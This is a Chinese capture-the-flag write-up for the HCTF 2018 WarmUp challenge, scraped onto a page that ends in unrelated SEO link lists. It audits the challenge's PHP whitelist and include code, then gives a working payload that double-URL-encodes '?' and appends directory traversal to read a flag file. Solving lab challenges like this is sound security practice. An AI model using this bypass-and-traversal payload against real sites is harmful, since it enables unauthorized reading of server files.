当前位置: 首页 > news >正文

注册网站地址德州网站优化

注册网站地址,德州网站优化,深圳市罗湖区住房和建设局网站,app推广方案怎么写题目 点进页面&#xff0c;页面只有一张滑稽脸&#xff0c;没有其他的提示信息 查看网页源代码&#xff0c;发现source.php&#xff0c;尝试访问一下 跳转至该页面&#xff0c;页面显示为一段php代码&#xff0c;需要进行代码审计 <?phphighlight_file(__FILE__);class emm…

题目

点进页面,页面只有一张滑稽脸,没有其他的提示信息

查看网页源代码,发现source.php,尝试访问一下

跳转至该页面,页面显示为一段php代码,需要进行代码审计

 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){//白名单验证$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}//isset是判断page是否为空。由于传进来的page为一个字符串且不为空,所以返回falseif (in_array($page, $whitelist)) {//对输入进行判断,是否为白名单类的内容return true;}/*in_array的意思是判断page里是否包含白名单里的内容 例如source.php  hint.php。就是page=source.php或者hint.php才行.所以最后返回了false。*/$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));/*这里mb_substr 是个截断,返回0到mb_strpos之间的内容,而mb_strpos 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/if (in_array($_page, $whitelist)) {return true;}
/*经过上面的截断代码,page=source.php  所以返回true ,文件可以得到包含,结束,下面的代码就不用在执行了*/$_page = urldecode($page);//进行url解码//输入的url会进行一次解码,通过这个函数进行再一次解码,所以对“?”要进行二次编码==》%253F(%25是%的url编码,进行过一次后为%3F,在进行一次解码后变为“?”)$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file']) //输入不能为空&& is_string($_REQUEST['file'])//判断是否为string类型&& emmm::checkFile($_REQUEST['file'])//调用emm类中的checkFile方法) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?> 

先访问hint.php看看有没有别的提示信息

根据提示信息,进行目录穿越可获得flag,这里flag写了四次,可能使用四个或五个../

构造payload

http://1f0787c3-39e3-43b6-9583-f8ecb87aae1c.node4.buuoj.cn:81/?file=hint.php%253F../../../../../ffffllllaaaagggg

得到flag

总结

mb_substr()函数返回字符串的一部分,substr()函数,只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。

若start参数是负数且length小于或等于start,则length为0

如果在测试时没有匹配到指定符号,将返回字符串长度

代码审计参考链接:

[HCTF 2018]WarmUp_ke1nys的博客-CSDN博客

[HCTF 2018]WarmUp_浑水摸鱼的咸鱼的博客-CSDN博客

http://www.yayakq.cn/news/117533/

相关文章:

  • 网站手机访问跳转个人做网站平台
  • 网络小说网站三巨头在线设计平台教学
  • 网站建设淘宝客模板下载wordpress评论内网ip
  • 网站开发 erp系统开发厦门seo网站优化
  • 自己电脑做网站访问快吗品牌策划书模板
  • 提高网站流量原则网站图怎么做会高清图片
  • 购物网站大全分类wordpress安装音乐插件怎么用
  • 江西专业网站建设定制玩具 东莞网站建设 技术支持
  • 阿里云linux主机如何添加2个网站前端需要学什么
  • 云南大永高速公路建设指挥部网站北京哪里可以申请企业网站域名官网
  • 深圳工信部网站备案信息查询微网站建设最新报价
  • 网站域名购买方法网页设计与制作跟编程有关吗
  • 优质的南昌网站设计自己做的网站 网站备案流程
  • 门户网站建设公司渠道免费查企业老板的软件
  • 免费做电子书的网站苏州电商网站建设
  • 下载asp做网站无极官方网站下载
  • 杭州外贸网站建设公司申跃应用软件开发包括什么
  • 小程序软件制作网站电子商务网站建设如何实施
  • 南宁网站建设平台网站建设中页面
  • 网站不能访问如何做冗余wordpress引用群晖文件夹
  • 南通做网站公司哪家好中国三大生产建设兵团
  • 网站建设策划方案书wordpress apple4us
  • 永州高端网站建设网站开发后台框架
  • 网站建设维护专员金蝶软件官网
  • 免费网站软件app网站建设推广信息
  • 网站开发的主要工作wordpress开发手册中文版
  • 怎么修改网站内容做健身类小程序的网站
  • 网站开发的英文文献网站建设行业分析报告
  • 公司网站功能性建设有哪些乌海市网站建设
  • 个人网站的设计师wordpress 页面 编辑